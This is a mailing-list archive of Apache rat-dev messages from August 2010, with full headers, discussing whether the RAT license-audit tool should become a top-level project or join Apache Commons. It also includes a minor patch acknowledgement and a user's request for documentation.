>> TLPs are not "expensive", so they don't have to have a "minimum size" >> to justify their existence. >>=20 >> Cheers, >> -g >>=20 >> On Tue, Aug 10, 2010 at 12:37, Mark Struberg <[email protected]> wrote: >>> RAT is very important and helpful, but I don't think it's big enough to >> justify >>> an own TLP. >>> It previously was under codehaus and I agree it would best fit under th= e >> maven >>> TLP. >>>=20 >>> LieGrue, >>> strub >>>=20 >>>=20 >>> ----- Original Message ---- >>>> From: Jochen Wiedmann <[email protected]> >>>> To: [email protected] >>>> Sent: Tue, August 10, 2010 4:47:49 PM >>>> Subject: Re: Future of RAT >>>>=20 >>>> On Tue, Aug 10, 2010 at 4:03 PM, Mattmann, Chris A (388J) >>>> <[email protected]> wrote: >>>>=20 >>>>> I feel kind of the opposite -- RAT is an important tool that's >> required of >>>>> all the Incubator projects, but pretty widely integrated (at least i= n >> Java >>>>> land) outside of the Incubator as a tool to help check ASF policies. >> To me, >>>>> that's a big scope and an important community, and just based on the >>>>> telltale signs it seems like a TLP to me. >>>>=20 >>>> Quick, hire him for chair ;-) >>>>=20 >>>>=20 >>>>=20 >>>> -- >>>> I Am What I Am And That's All What I Yam (Popeye) >>>>=20 >>>> --------------------------------------------------------------------- >>>> To unsubscribe, e-mail: [email protected] >>>> For additional commands, e-mail: [email protected] >>>>=20 >>>>=20 >>>=20 >>>=20 >>>=20 >>>=20 >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>>=20 >>>=20 >>=20 >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >>=20 >>=20 >=20 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Chris Mattmann, Ph.D. Senior Computer Scientist NASA Jet Propulsion Laboratory Pasadena, CA 91109 USA Office: 171-266B, Mailstop: 171-246 Email: [email protected] WWW: http://sunset.usc.edu/~mattmann/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Adjunct Assistant Professor, Computer Science Department University of Southern California, Los Angeles, CA 90089 USA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Tue Aug 10 18:30:05 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16439 invoked from network); 10 Aug 2010 18:30:04 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 18:30:04 -0000 Received: (qmail 39448 invoked by uid 500); 10 Aug 2010 18:30:04 -0000 Delivered-To: [email protected] Received: (qmail 39398 invoked by uid 500); 10 Aug 2010 18:30:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 78669 invoked by uid 99); 10 Aug 2010 15:34:17 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:cc:content-type; bh=GErQM6SLE/xP/zFU8f+bBU+HUy98s/vGhbr5qDAVQg4=; b=k1rCZMcXcb9cZGdj+CkhJr9wyjxxknHqWLObe0oWGVINzs+1l7ZInuae90NJkmjJIf EM1Guxg/XJSRDdaKHJ6XZ48mbasursRMcA6Qsm7Os+viZJnZpZAjz3S3SMbH+KmQBxuH jb46watn7BgSdOh7Tob9XfntpMLSQoz18r/Go= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; b=dOl7Yt7MfOozUEz6PU7fvSpsu3F0hDbxaiP7DefN3VZ01oXxFvaXE0YtTx9M/NixMQ cmN06QgAoR9RbQHG3WASkckezdMPDwfgONck8P+Oxk1tPWKqR4bD4gKQhxs3iOzWz7g1 uiT/Qxka9d7z6BQxK7h+jmWDzGBbofg5BdRUA= MIME-Version: 1.0 In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 10 Aug 2010 08:33:49 -0700 Message-ID: <[email protected]> Subject: Re: Future of RAT From: Henri Yandell <[email protected]> To: Commons Developers List <[email protected]> Cc: general-incubator <[email protected]>, [email protected] Content-Type: text/plain; charset=ISO-8859-1 On Tue, Aug 10, 2010 at 3:40 AM, Jochen Wiedmann <[email protected]> wrote: > If > there will ever be a migration to a new license like ASL 3 or a > another change of the header policy, then RAT will likely play a very > important part in the process. There's also an SPDX spec coming to describe the licensing in products; I could see RAT being very useful there as an automatic checker against some standard approve/no-approve/exception-list rule set. > The question is: What's the target? RAT is way too small for an > independent project. And I cannot imagine anybody of the current > committers writing board reports. To me, a Rat TLP is no option. So we > have the second possibility: Put it under the hat of another TLP. The > only one that comes to my mind is the Apache Commons project. TLP and PMC are technically different questions. An option would be for a RAT PMC, but to make its web presence part of Infra or Legal committees. > But Commons would be an excellent choice: Most, or even all of the RAT > committers are Commons committers as well. Commons was one of the > drivers for integration of RAT into every release build. I admit that > I wouldn't like to change the package name or the Maven group ID > again, but either Commons developers could accept that exception from > the rule or I'd force myself to do the required changes. > > WDYT? +0. I wouldn't want to keep the separate list, package name seems fine. Commons is a fair choice. Hen From [email protected] Tue Aug 10 19:28:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37310 invoked from network); 10 Aug 2010 19:28:39 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 19:28:39 -0000 Received: (qmail 21634 invoked by uid 500); 10 Aug 2010 19:28:39 -0000 Delivered-To: [email protected] Received: (qmail 21576 invoked by uid 500); 10 Aug 2010 19:28:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21560 invoked by uid 99); 10 Aug 2010 19:28:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 19:28:38 +0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO rcsinet10.oracle.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 19:28:31 +0000 Received: from rcsinet13.oracle.com (rcsinet13.oracle.com [161.129.204.104]) by rcsinet10.oracle.com (Switch-3.4.2/Switch-3.4.2) with ESMTP id o7AJS8T9014636 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK); Tue, 10 Aug 2010 19:28:09 GMT Received: from acsmt355.oracle.com (acsmt355.oracle.com [161.129.204.104]) by rcsinet13.oracle.com (Switch-3.4.2/Switch-3.4.1) with ESMTP id o7AJS7rU004599; Tue, 10 Aug 2010 19:28:07 GMT Received: from abhmt013.oracle.com by acsmt354.oracle.com with ESMTP id 484045961281468392; Tue, 10 Aug 2010 12:26:32 -0700 Received: from [161.129.204.104] (/161.129.204.104) by default (Oracle Beehive Gateway v4.0) with ESMTP ; Tue, 10 Aug 2010 12:26:32 -0700 From: Craig L Russell <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Subject: Re: Future of RAT References: <[email protected]> Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v936) Date: Tue, 10 Aug 2010 12:26:23 -0700 Cc: "[email protected]" <[email protected]> X-Mailer: Apple Mail (2.936) X-Virus-Checked: Checked by ClamAV on apache.org On Aug 10, 2010, at 10:59 AM, Mattmann, Chris A (388J) wrote: > Hi Dan, > >> Perhaps this just needs generalizing a smidge. >> >> Who are the users of/community for RAT? If that can be determined >> then the >> TLP should be named after this community, rather than after RAT >> itself. >> >> eg, if RAT is deemed to be for "internal" apache use, then call the >> TLP >> internal.apache.org. RAT then just happens to be the first such >> "internal" >> tool. If other tools for the same community are written, then >> they would >> also go into this TLP. > > While I'm not against what you propose at all, I don't think it > makes sense > to use the graduation of RAT in isolation as a vehicle for your > proposal > above. If such a proposal makes sense (after time of seeing more and > more > "internal" Apache tools), then it would make sense to put it forward > at that > time. > > In the meanwhile, there is an actionable, concrete proposal here I > believe > for a RAT TLP. +1 to Greg's comments: every TLP doesn't have to be a > behemoth pseudo-Incubator like many of our other TLPs. Some of them > work > just fine as smaller, driven projects with communities of all sizes. I'd suggest letting the RAT PPMC decide what they want to do. If they are unable to come to a decision, they can come back and ask for more opinions. Craig > > Cheers, > Chris > >> >> >> >> On 10 August 2010 18:20, Greg Stein <[email protected]> wrote: >> >>> Let me repeat: where does it say a TLP must be "at least THIS >>> size" ? >>> >>> Answer: nowhere. >>> >>> Small projects are just fine. We're looking at the overall community >>> and the people to shepherd that community. Those are the RAT >>> developers and users. Not the Apache Commons or Apache Maven people. >>> They have other concerns and focus points. >>> >>> TLPs are not "expensive", so they don't have to have a "minimum >>> size" >>> to justify their existence. >>> >>> Cheers, >>> -g >>> >>> On Tue, Aug 10, 2010 at 12:37, Mark Struberg <[email protected]> >>> wrote: >>>> RAT is very important and helpful, but I don't think it's big >>>> enough to >>> justify >>>> an own TLP. >>>> It previously was under codehaus and I agree it would best fit >>>> under the >>> maven >>>> TLP. >>>> >>>> LieGrue, >>>> strub >>>> >>>> >>>> ----- Original Message ---- >>>>> From: Jochen Wiedmann <[email protected]> >>>>> To: [email protected] >>>>> Sent: Tue, August 10, 2010 4:47:49 PM >>>>> Subject: Re: Future of RAT >>>>> >>>>> On Tue, Aug 10, 2010 at 4:03 PM, Mattmann, Chris A (388J) >>>>> <[email protected]> wrote: >>>>> >>>>>> I feel kind of the opposite -- RAT is an important tool that's >>> required of >>>>>> all the Incubator projects, but pretty widely integrated (at >>>>>> least in >>> Java >>>>>> land) outside of the Incubator as a tool to help check ASF >>>>>> policies. >>> To me, >>>>>> that's a big scope and an important community, and just based >>>>>> on the >>>>>> telltale signs it seems like a TLP to me. >>>>> >>>>> Quick, hire him for chair ;-) >>>>> >>>>> >>>>> >>>>> -- >>>>> I Am What I Am And That's All What I Yam (Popeye) >>>>> >>>>> --------------------------------------------------------------------- >>>>> To unsubscribe, e-mail: [email protected] >>>>> For additional commands, e-mail: general- >>>>> [email protected] >>>>> >>>>> >>>> >>>> >>>> >>>> >>>> --------------------------------------------------------------------- >>>> To unsubscribe, e-mail: [email protected] >>>> For additional commands, e-mail: [email protected] >>>> >>>> >>> >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>> >>> >> > > > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > Chris Mattmann, Ph.D. > Senior Computer Scientist > NASA Jet Propulsion Laboratory Pasadena, CA 91109 USA > Office: 171-266B, Mailstop: 171-246 > Email: [email protected] > WWW: http://sunset.usc.edu/~mattmann/ > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > Adjunct Assistant Professor, Computer Science Department > University of Southern California, Los Angeles, CA 90089 USA > ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > Craig L Russell Architect, Oracle http://db.apache.org/jdo 5047774238 mailto:[email protected] P.S. A good JDO? O, Gasp! From [email protected] Tue Aug 10 21:00:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79234 invoked from network); 10 Aug 2010 21:00:59 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 21:00:59 -0000 Received: (qmail 42969 invoked by uid 500); 10 Aug 2010 21:00:59 -0000 Delivered-To: [email protected] Received: (qmail 42917 invoked by uid 500); 10 Aug 2010 21:00:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 33834 invoked by uid 99); 10 Aug 2010 20:55:14 -0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) X-VirusChecked: Checked X-Env-Sender: [email protected] X-Msg-Ref: server-6.tower-76.messagelabs.com!1281473680!74408082!1 X-StarScan-Version: 6.2.4; banners=-,-,- X-Originating-IP: [161.129.204.104] From: Gary Gregory <[email protected]> To: Commons Developers List <[email protected]>, "[email protected]" <[email protected]>, "[email protected]" <[email protected]> Subject: RE: Future of RAT Thread-Topic: Future of RAT Thread-Index: AQHLOHiIMAMFS1U1/Eqr+zRuO2D5a5La9rwA///BF+6AAHOVAA== Date: Tue, 10 Aug 2010 20:54:36 +0000 Message-ID: <[email protected]> References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 > -----Original Message----- > From: Stefan Bodewig [mailto:[email protected]] > Sent: Tuesday, August 10, 2010 07:00 > To: [email protected]; [email protected]; > [email protected] > Subject: Re: Future of RAT >=20 > On 2010-08-10, Mattmann, Chris A (388J) wrote: >=20 > > However, I'm not sure I get the whole reasoning below RE: TLP? Why not > > have a RAT TLP? The overhead of filing board reports and not knowing > > anyone on the team that would be able to? >=20 > Jochen has sure be joking here. The team list he pointed at contains at > least two current PMC chairs (haven't checked too closely) as well as a > bunch of former PMC chairs. >=20 > To me RAT's scope feels too small for a TLP. I tend to agree. Commons seems like a good place. Gary >=20 > Stefan >=20 > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] From [email protected] Wed Aug 11 02:44:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10592 invoked from network); 11 Aug 2010 02:44:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Aug 2010 02:44:38 -0000 Received: (qmail 26766 invoked by uid 500); 11 Aug 2010 02:44:38 -0000 Delivered-To: [email protected] Received: (qmail 26714 invoked by uid 500); 11 Aug 2010 02:44:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26697 invoked by uid 99); 11 Aug 2010 02:44:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 02:44:36 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO cell.p6m7g8.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 02:44:28 +0000 Received: from [161.129.204.104] (pool-173-66-132-185.washdc.fios.verizon.net [161.129.204.104]) (authenticated bits=0) by cell.p6m7g8.net (8.14.4/8.14.3) with ESMTP id o7B2i5BP008602 (version=TLSv1/SSLv3 cipher=DHE-DSS-CAMELLIA256-SHA bits=256 verify=NO); Wed, 11 Aug 2010 02:44:06 GMT (envelope-from [email protected]) Message-ID: <[email protected]> Date: Tue, 10 Aug 2010 22:43:55 -0400 From: "Philip M. Gollucci" <[email protected]> Organization: P6M7G8 Inc. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] CC: Justin Erenkrantz <[email protected]>, [email protected] Subject: Re: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: * X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on cell.p6m7g8.net X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=1.7 required=5.0 tests=BAYES_00,FH_HOST_EQ_VERIZON_P, RCVD_IN_RP_RNBL,RCVD_IN_SORBS_DUL,RDNS_DYNAMIC,TO_NO_BRKTS_DYNIP autolearn=no version=3.3.1 On 8/10/2010 10:39 PM, Justin Erenkrantz wrote: > On Tue, Aug 10, 2010 at 12:50 PM, Greg Stein<[email protected]> wrote: >> It is *very* true that Infra, Legal, and (all?) ASF PMCs will be >> clients/users of the tool. But are they interested in its development? > > If it goes under infra (as some are pushing for), then Joe gets to > rewrite it in Perl. Hey, that's not a bad idea! =P -- justin Joe can rewrite it perl no matter what you do. -- ------------------------------------------------------------------------ 1024D/DB9B8C1C B90B FBC3 A3A1 C71A 8E70 3F8C 75B8 8FFB DB9B 8C1C Philip M. Gollucci ([email protected]) c: 5047774238 VP Apache Infrastructure; Member, Apache Software Foundation Committer, FreeBSD Foundation Consultant, P6M7G8 Inc. Sr. System Admin, Ridecharge Inc. Work like you don't need the money, love like you'll never get hurt, and dance like nobody's watching. From [email protected] Wed Aug 11 03:27:07 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24320 invoked from network); 11 Aug 2010 03:27:07 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Aug 2010 03:27:07 -0000 Received: (qmail 46724 invoked by uid 500); 11 Aug 2010 03:27:07 -0000 Delivered-To: [email protected] Received: (qmail 46660 invoked by uid 500); 11 Aug 2010 03:27:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46645 invoked by uid 99); 11 Aug 2010 03:27:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 03:27:04 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 03:26:56 +0000 Received: by qyk32 with SMTP id 32so11201870qyk.6 for <multiple recipients>; Tue, 10 Aug 2010 20:26:35 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m16mr8811716qcq.260.1281497194982; Tue, 10 Aug 2010 20:26:34 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 20:26:34 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 10 Aug 2010 22:26:34 -0500 X-Google-Sender-Auth: t13NI0vRk344mCedcGzQZU7Natc Message-ID: <[email protected]> Subject: Re: Future of RAT From: "Hyrum K. Wright" <[email protected]> To: [email protected] Cc: [email protected], Justin Erenkrantz <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Tue, Aug 10, 2010 at 9:43 PM, Philip M. Gollucci <[email protected]> wrote: > On 8/10/2010 10:39 PM, Justin Erenkrantz wrote: >> >> On Tue, Aug 10, 2010 at 12:50 PM, Greg Stein<[email protected]> =A0wrote: >>> >>> It is *very* true that Infra, Legal, and (all?) ASF PMCs will be >>> clients/users of the tool. But are they interested in its development? >> >> If it goes under infra (as some are pushing for), then Joe gets to >> rewrite it in Perl. =A0Hey, that's not a bad idea! =A0=3DP =A0-- justin It already *is* being rewritten in Python. :) -Hyrum From [email protected] Wed Aug 11 11:22:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63718 invoked from network); 11 Aug 2010 11:22:53 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Aug 2010 11:22:53 -0000 Received: (qmail 13180 invoked by uid 500); 11 Aug 2010 11:22:53 -0000 Delivered-To: [email protected] Received: (qmail 13127 invoked by uid 500); 11 Aug 2010 11:22:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13119 invoked by uid 99); 11 Aug 2010 11:22:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 11:22:50 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 11:22:43 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id C6E1628985D1 for <[email protected]>; Wed, 11 Aug 2010 13:22:21 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 0dsSXx0NIcLJ for <[email protected]>; Wed, 11 Aug 2010 13:22:21 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 374C028985D2; Wed, 11 Aug 2010 13:22:19 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] Remove unused function References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1036) Date: Wed, 11 Aug 2010 13:22:18 +0200 In-Reply-To: <[email protected]> (Hyrum K. Wright's message of "Mon, 9 Aug 2010 09:59:27 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-08-09, Hyrum K. Wright wrote: > Another trivial cleanup patch, this one removing a completely unused > function. Given the method was public I almost started a discussion on backwards compatibility but then I saw the containing class itself was a private inner class so the method wasn't that public anyway. It's gone with revision 984372 Thanks Stefan From [email protected] Wed Aug 11 20:06:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22313 invoked from network); 11 Aug 2010 20:06:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Aug 2010 20:06:41 -0000 Received: (qmail 90297 invoked by uid 500); 11 Aug 2010 20:06:41 -0000 Delivered-To: [email protected] Received: (qmail 89765 invoked by uid 500); 11 Aug 2010 20:06:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89757 invoked by uid 99); 11 Aug 2010 20:06:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 20:06:40 +0000 X-ASF-Spam-Status: No, hits=1.0 required=10.0 tests=SPF_HELO_PASS,SPF_SOFTFAIL X-Spam-Check-By: apache.org Received-SPF: softfail (nike.apache.org: transitioning domain of [email protected] does not designate 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mxout-08.mxes.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 20:06:31 +0000 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher AES128-SHA (128/128 bits)) (No client certificate requested) by smtp.mxes.net (Postfix) with ESMTPSA id 67845509DF for <[email protected]>; Wed, 11 Aug 2010 16:05:55 -0400 (EDT) From: =?iso-8859-1?Q?Nicolas_Lalev=E9e?= <[email protected]> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Subject: Documentation Date: Wed, 11 Aug 2010 22:05:52 +0200 Message-Id: <[email protected]> To: rat-dev <[email protected]> Mime-Version: 1.0 (Apple Message framework v1081) X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org I would like to use RAT for IvyDE, Jan started to set it up [1]. Now I would need to "tune" it. So I am looking for documentation, and I = just cannot find any. Is there some ? where ? If there is none, then I have some questions. Does RAT is supposed to be run against a source tree or the packaged = artifacts ready to be deployed on apache dist ? Could rat be integrated into a CI build so we can get notified if a = commit break the Apache guidelines ? Nicolas [1] https://issues.apache.org/jira/browse/IVYDE-250 From [email protected] Wed Aug 11 21:24:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54398 invoked from network); 11 Aug 2010 21:24:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Aug 2010 21:24:44 -0000 Received: (qmail 78471 invoked by uid 500); 11 Aug 2010 21:24:44 -0000 Delivered-To: [email protected] Received: (qmail 78432 invoked by uid 500); 11 Aug 2010 21:24:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78424 invoked by uid 99); 11 Aug 2010 21:24:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 21:24:44 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Aug 2010 21:24:38 +0000 Received: by qyk32 with SMTP id 32so715795qyk.6 for <[email protected]>; Wed, 11 Aug 2010 14:24:18 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=xuV5DXc5+AhdGgLkqf24qA//ewdxoaianb+wlXXeGCY=; b=cCs5hQv4Xi42D/jRpqkj9biFGi9r6DqmIqCBrBB7OtEDscuX7wbwRM7i1XZx/6dCd3 18+QAOXXUuNTvq/d0QpXsZttDqJWIVSVsk/CGUqLTbC9FUc2bHJ+i0huUbF4Bg8H7L95 oSssxknwbpOmMmOW9/gzGV8bEaKFqheSZBtKI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=nI1VuA5s9JEBKEKurApXLi4f/mfy8+GPcE0e0v50Eesy5APyGAmkMXgdglIgL4pGwa zzKIhEziNcqvwcSdEcSPN6Fi+uB6c+h/kcffHBk9tmgD2iIT+vmt3WAxMphxqW7X+hoF JlnSlkVcgUtzEdFN7eNqYYq6JMSs029Ij6zvs= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id v3mr9983674qcd.169.1281561858163; Wed, 11 Aug 2010 14:24:18 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 11 Aug 2010 14:24:18 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 11 Aug 2010 23:24:18 +0200 Message-ID: <[email protected]> Subject: Re: Documentation From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi, Nicolas, sadly, but there is no documentation. To include RAT into a CI build, you have to use either of the three frontends for running RAT. See http://incubator.apache.org/rat/ for how to do that. Jochen 2010/8/11 Nicolas Lalev=C3=A9e <[email protected]>: > I would like to use RAT for IvyDE, Jan started to set it up [1]. > Now I would need to "tune" it. So I am looking for documentation, and I j= ust cannot find any. > Is there some ? where ? > > If there is none, then I have some questions. > Does RAT is supposed to be run against a source tree or the packaged arti= facts ready to be deployed on apache dist ? > Could rat be integrated into a CI build so we can get notified if a commi= t break the Apache guidelines ? > > Nicolas > > [1] 